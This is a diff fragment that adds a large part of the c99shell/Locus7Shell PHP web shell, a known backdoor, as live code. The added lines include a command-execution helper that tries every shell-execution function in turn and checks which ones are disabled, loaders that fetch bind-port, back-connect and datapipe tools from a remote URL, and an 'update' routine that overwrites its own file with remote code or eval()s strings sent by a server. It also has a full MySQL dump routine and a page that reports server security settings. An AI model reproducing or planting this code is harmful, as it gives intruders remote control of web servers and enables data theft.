+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} 
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); 
+  header("HTTP/1.0 401 Unauthorized"); 
+  exit($accessdeniedmess); 
+ } 
+} 
+if ($act != "img") 
+{ 
+$lastdir = realpath("."); 
+chdir($curdir); 
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} 
+$sess_data = unserialize($_COOKIE["$sess_cookie"]); 
+if (!is_array($sess_data)) {$sess_data = array();} 
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} 
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} 
+
+$disablefunc = @ini_get("disable_functions"); 
+if (!empty($disablefunc)) 
+{ 
+ $disablefunc = str_replace(" ","",$disablefunc); 
+ $disablefunc = explode(",",$disablefunc); 
+} 
+
+if (!function_exists("c99_buff_prepare")) 
+{ 
+function c99_buff_prepare() 
+{ 
+ global $sess_data; 
+ global $act; 
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ $sess_data["copy"] = array_unique($sess_data["copy"]); 
+ $sess_data["cut"] = array_unique($sess_data["cut"]); 
+ sort($sess_data["copy"]); 
+ sort($sess_data["cut"]); 
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} 
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} 
+} 
+} 
+c99_buff_prepare(); 
+
+if (!function_exists("c99_sess_put")) 
+{ 
+function c99_sess_put($data) 
+{ 
+ global $sess_cookie; 
+ global $sess_data; 
+ c99_buff_prepare(); 
+ $sess_data = $data; 
+ $data = serialize($data); 
+ setcookie($sess_cookie,$data); 
+} 
+} 
+foreach (array("sort","sql_sort") as $v) 
+{ 
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];} 
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];} 
+} 
+if ($sort_save) 
+{ 
+ if (!empty($sort)) {setcookie("sort",$sort);} 
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} 
+} 
+if (!function_exists("str2mini")) 
+{ 
+function str2mini($content,$len) 
+{ 
+ if (strlen($content) > $len) 
+ { 
+  $len = ceil($len/2) - 2; 
+  return substr($content, 0,$len)."...".substr($content,-$len); 
+ } 
+ else {return $content;} 
+} 
+} 
+if (!function_exists("view_size")) 
+{ 
+function view_size($size) 
+{ 
+ if (!is_numeric($size)) {return FALSE;} 
+ else 
+ { 
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
+  else {$size = $size . " B";} 
+  return $size; 
+ } 
+} 
+} 
+if (!function_exists("fs_copy_dir")) 
+{ 
+function fs_copy_dir($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_copy_obj")) 
+{ 
+function fs_copy_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));} 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_copy_dir($d,$t); 
+ } 
+ elseif (is_file($d)) {return copy($d,$t);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_move_dir")) 
+{ 
+function fs_move_dir($d,$t) 
+{ 
+ $h = opendir($d); 
+ if (!is_dir($t)) {mkdir($t);} 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   $ret = TRUE; 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_move_obj")) 
+{ 
+function fs_move_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_move_dir($d,$t); 
+ } 
+ elseif (is_file($d)) 
+ { 
+  if(copy($d,$t)) {return unlink($d);} 
+  else {unlink($t); return FALSE;} 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_rmdir")) 
+{ 
+function fs_rmdir($d) 
+{ 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.$o)) {unlink($d.$o);} 
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} 
+  } 
+ } 
+ closedir($h); 
+ rmdir($d); 
+ return !is_dir($d); 
+} 
+} 
+if (!function_exists("fs_rmobj")) 
+{ 
+function fs_rmobj($o) 
+{ 
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); 
+ if (is_dir($o)) 
+ { 
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} 
+  return fs_rmdir($o); 
+ } 
+ elseif (is_file($o)) {return unlink($o);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("myshellexec")) 
+{ 
+function myshellexec($cmd) 
+{ 
+ global $disablefunc; 
+ $result = ""; 
+ if (!empty($cmd)) 
+ { 
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} 
+  elseif (($result = `$cmd`) !== FALSE) {} 
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_resource($fp = popen($cmd,"r"))) 
+  { 
+   $result = ""; 
+   while(!feof($fp)) {$result .= fread($fp,1024);} 
+   pclose($fp); 
+  } 
+ } 
+ return $result; 
+} 
+} 
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} 
+if (!function_exists("view_perms")) 
+{ 
+function view_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$type = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";} 
+ else {$type = "?";} 
+
+ $owner["read"] = ($mode & 00400)?"r":"-"; 
+ $owner["write"] = ($mode & 00200)?"w":"-"; 
+ $owner["execute"] = ($mode & 00100)?"x":"-"; 
+ $group["read"] = ($mode & 00040)?"r":"-"; 
+ $group["write"] = ($mode & 00020)?"w":"-"; 
+ $group["execute"] = ($mode & 00010)?"x":"-"; 
+ $world["read"] = ($mode & 00004)?"r":"-"; 
+ $world["write"] = ($mode & 00002)? "w":"-"; 
+ $world["execute"] = ($mode & 00001)?"x":"-"; 
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} 
+
+ return $type.join("",$owner).join("",$group).join("",$world); 
+} 
+} 
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} 
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} 
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} 
+if (!function_exists("parse_perms")) 
+{ 
+function parse_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$t = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";} 
+ else {$t = "?";} 
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; 
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; 
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; 
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); 
+} 
+} 
+if (!function_exists("parsesort")) 
+{ 
+function parsesort($sort) 
+{ 
+ $one = intval($sort); 
+ $second = substr($sort,-1); 
+ if ($second != "d") {$second = "a";} 
+ return array($one,$second); 
+} 
+} 
+if (!function_exists("view_perms_color")) 
+{ 
+function view_perms_color($o) 
+{ 
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} 
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} 
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";} 
+} 
+} 
+if (!function_exists("c99getsource")) 
+{ 
+function c99getsource($fn) 
+{ 
+ global $c99sh_sourcesurl; 
+ $array = array( 
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", 
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt", 
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", 
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt", 
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", 
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", 
+ ); 
+ $name = $array[$fn]; 
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99sh_getupdate")) 
+{ 
+function c99sh_getupdate($update = TRUE) 
+{ 
+ $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; 
+ $data = @file_get_contents($url); 
+ if (!$data) {return "Can't connect to update-server!";} 
+ else 
+ { 
+  $data = ltrim($data); 
+  $string = substr($data,3,ord($data{2})); 
+  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} 
+  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} 
+  if ($data{0} == "\x99" and $data{1} == "\x03") 
+  { 
+   $string = explode("\x01",$string); 
+   if ($update) 
+   { 
+    $confvars = array(); 
+    $sourceurl = $string[0]; 
+    $source = file_get_contents($sourceurl); 
+    if (!$source) {return "Can't fetch update!";} 
+    else 
+    { 
+     $fp = fopen(__FILE__,"w"); 
+     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} 
+     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} 
+    } 
+   } 
+   else {return "New version are available: ".$string[1];} 
+  } 
+  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} 
+  else {return "Error in protocol: segmentation failed! (".$data.") ";} 
+ } 
+} 
+} 
+if (!function_exists("mysql_dump")) 
+{ 
+function mysql_dump($set) 
+{ 
+ global $shver; 
+ $sock = $set["sock"]; 
+ $db = $set["db"]; 
+ $print = $set["print"]; 
+ $nl2br = $set["nl2br"]; 
+ $file = $set["file"]; 
+ $add_drop = $set["add_drop"]; 
+ $tabs = $set["tabs"]; 
+ $onlytabs = $set["onlytabs"]; 
+ $ret = array(); 
+ $ret["err"] = array(); 
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} 
+ if (empty($db)) {$db = "db";} 
+ if (empty($print)) {$print = 0;} 
+ if (empty($nl2br)) {$nl2br = 0;} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (empty($file)) 
+ { 
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; 
+ } 
+ if (!is_array($tabs)) {$tabs = array();} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (sizeof($tabs) == 0) 
+ { 
+  // retrive tables-list 
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock); 
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} 
+ } 
+ $out = "# Dumped by Locous7Shell.SQL v. ".$shver." 
+# Home page: http://www.Locus7s.com 
+# 
+# Host settings: 
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." 
+# Date: ".date("d.m.Y H:i:s")." 
+# DB: \"".$db."\" 
+#--------------------------------------------------------- 
+"; 
+ $c = count($onlytabs); 
+ foreach($tabs as $tab) 
+ { 
+  if ((in_array($tab,$onlytabs)) or (!$c)) 
+  { 
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} 
+   // recieve query for create table structure 
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); 
+   if (!$res) {$ret["err"][] = mysql_smarterror();} 
+   else 
+   { 
+    $row = mysql_fetch_row($res); 
+    $out .= $row["1"].";\n\n"; 
+    // recieve table variables 
+    $res = mysql_query("SELECT * FROM `$tab`", $sock); 
+    if (mysql_num_rows($res) > 0) 
+    { 
+     while ($row = mysql_fetch_assoc($res)) 
+     { 
+      $keys = implode("`, `", array_keys($row)); 
+      $values = array_values($row); 
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+      $values = implode("', '", $values); 
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+      $out .= $sql; 
+     } 
+    } 
+   } 
+  } 
+ } 
+ $out .= "#---------------------------------------------------------------------------------\n\n"; 
+ if ($file) 
+ { 
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret["err"][] = 2;} 
+  else 
+  { 
+   fwrite ($fp, $out); 
+   fclose ($fp); 
+  } 
+ } 
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} 
+ return $out; 
+} 
+} 
+if (!function_exists("mysql_buildwhere")) 
+{ 
+function mysql_buildwhere($array,$sep=" and",$functs=array()) 
+{ 
+ if (!is_array($array)) {$array = array();} 
+ $result = ""; 
+ foreach($array as $k=>$v) 
+ { 
+  $value = ""; 
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";} 
+  $value .= "'".addslashes($v)."'"; 
+  if (!empty($functs[$k])) {$value .= ")";} 
+  $result .= "`".$k."` = ".$value.$sep; 
+ } 
+ $result = substr($result,0,strlen($result)-strlen($sep)); 
+ return $result; 
+} 
+} 
+if (!function_exists("mysql_fetch_all")) 
+{ 
+function mysql_fetch_all($query,$sock) 
+{ 
+ if ($sock) {$result = mysql_query($query,$sock);} 
+ else {$result = mysql_query($query);} 
+ $array = array(); 
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;} 
+ mysql_free_result($result); 
+ return $array; 
+} 
+} 
+if (!function_exists("mysql_smarterror")) 
+{ 
+function mysql_smarterror($type,$sock) 
+{ 
+ if ($sock) {$error = mysql_error($sock);} 
+ else {$error = mysql_error();} 
+ $error = htmlspecialchars($error); 
+ return $error; 
+} 
+} 
+if (!function_exists("mysql_query_form")) 
+{ 
+function mysql_query_form() 
+{ 
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; 
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+ if ((!$submit) or ($sql_act)) 
+ { 
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; 
+  if ($tbl_struct) 
+  { 
+   echo "<td valign=\"top\"><b>Fields:</b><br>"; 
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} 
+   echo "</td></tr></table>"; 
+  } 
+ } 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} 
+} 
+} 
+if (!function_exists("mysql_create_db")) 
+{ 
+function mysql_create_db($db,$sock="") 
+{ 
+ $sql = "CREATE DATABASE `".addslashes($db)."`;"; 
+ if ($sock) {return mysql_query($sql,$sock);} 
+ else {return mysql_query($sql);} 
+} 
+} 
+if (!function_exists("mysql_query_parse")) 
+{ 
+function mysql_query_parse($query) 
+{ 
+ $query = trim($query); 
+ $arr = explode (" ",$query); 
+ /*array array() 
+ { 
+  "METHOD"=>array(output_type), 
+  "METHOD1"... 
+  ... 
+ } 
+ if output_type == 0, no output, 
+ if output_type == 1, no output if no error 
+ if output_type == 2, output without control-buttons 
+ if output_type == 3, output with control-buttons 
+ */ 
+ $types = array( 
+  "SELECT"=>array(3,1), 
+  "SHOW"=>array(2,1), 
+  "DELETE"=>array(1), 
+  "DROP"=>array(1) 
+ ); 
+ $result = array(); 
+ $op = strtoupper($arr[0]); 
+ if (is_array($types[$op])) 
+ { 
+  $result["propertions"] = $types[$op]; 
+  $result["query"]  = $query; 
+  if ($types[$op] == 2) 
+  { 
+   foreach($arr as $k=>$v) 
+   { 
+    if (strtoupper($v) == "LIMIT") 
+    { 
+     $result["limit"] = $arr[$k+1]; 
+     $result["limit"] = explode(",",$result["limit"]); 
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} 
+     unset($arr[$k],$arr[$k+1]); 
+    } 
+   } 
+  } 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99fsearch")) 
+{ 
+function c99fsearch($d) 
+{ 
+ global $found; 
+ global $found_d; 
+ global $found_f; 
+ global $search_i_f; 
+ global $search_i_d; 
+ global $a; 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($f = readdir($h)) !== FALSE) 
+ { 
+  if($f != "." && $f != "..") 
+  { 
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); 
+   if (is_dir($d.$f)) 
+   { 
+    $search_i_d++; 
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} 
+    if (!is_link($d.$f)) {c99fsearch($d.$f);} 
+   } 
+   else 
+   { 
+    $search_i_f++; 
+    if ($bool) 
+    { 
+     if (!empty($a["text"])) 
+     { 
+      $r = @file_get_contents($d.$f); 
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} 
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} 
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} 
+      else {$bool = strpos(" ".$r,$a["text"],1);} 
+      if ($a["text_not"]) {$bool = !$bool;} 
+      if ($bool) {$found[] = $d.$f; $found_f++;} 
+     } 
+     else {$found[] = $d.$f; $found_f++;} 
+    } 
+   } 
+  } 
+ } 
+ closedir($h); 
+} 
+} 
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} 
+//Sending headers 
+@ob_start(); 
+@ob_implicit_flush(0); 
+function onphpshutdown() 
+{ 
+ global $gzipencode,$ft; 
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) 
+ { 
+  $v = @ob_get_contents(); 
+  @ob_end_clean(); 
+  @ob_start("ob_gzHandler"); 
+  echo $v; 
+  @ob_end_flush(); 
+ } 
+} 
+function c99shexit() 
+{ 
+ onphpshutdown(); 
+ exit; 
+} 
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); 
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); 
+header("Cache-Control: no-store, no-cache, must-revalidate"); 
+header("Cache-Control: post-check=0, pre-check=0", FALSE); 
+header("Pragma: no-cache"); 
+if (empty($tmpdir)) 
+{ 
+ $tmpdir = ini_get("upload_tmp_dir"); 
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} 
+} 
+$tmpdir = realpath($tmpdir); 
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); 
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} 
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} 
+else {$tmpdir_logs = realpath($tmpdir_logs);} 
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") 
+{ 
+ $safemode = TRUE; 
+ $hsafemode = "<font color=red>ON (secure)</font>"; 
+} 
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} 
+$v = @ini_get("open_basedir"); 
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} 
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} 
+$sort = htmlspecialchars($sort); 
+if (empty($sort)) {$sort = $sort_default;} 
+$sort[1] = strtolower($sort[1]); 
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); 
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} 
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); 
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF 
+@ini_set("highlight.comment",$highlight_comment); //#FF8000 
+@ini_set("highlight.default",$highlight_default); //#0000BB 
+@ini_set("highlight.html",$highlight_html); //#000000 
+@ini_set("highlight.keyword",$highlight_keyword); //#007700 
+@ini_set("highlight.string",$highlight_string); //#DD0000 
+if (!is_array($actbox)) {$actbox = array();} 
+$dspact = $act = htmlspecialchars($act); 
+$disp_fullpath = $ls_arr = $notls = null; 
+$ud = urlencode($d); 
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - Locus7Shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #009900; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #009900; scrollbar-shadow-color: #000000; scrollbar-highlight-color: #00CC00; scrollbar-3dlight-color: #00CC00; scrollbar-darkshadow-color: #009900; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #000000; COLOR: green; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #009900; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #f89521; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #f89521; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #f89521; TEXT-DECORATION: none;}A:hover { COLOR: #f89521; TEXT-DECORATION: bold;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #009900; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #009900;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><center><img src="http://img244.imageshack.us/img244/6663/locus7sgm8.jpg"></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+$d = str_replace("\\\\","\\",$d); 
+$dispd = htmlspecialchars($d); 
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); 
+$i = 0; 
+foreach($pd as $b) 
+{ 
+ $t = ""; 
+ $j = 0; 
+ foreach ($e as $r) 
+ { 
+  $t.= $r.DIRECTORY_SEPARATOR; 
+  if ($j == $i) {break;} 
+  $j++; 
+ } 
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; 
+ $i++; 
+} 
+echo "&nbsp;&nbsp;&nbsp;"; 
+if (is_writable($d)) 
+{ 
+ $wd = TRUE; 
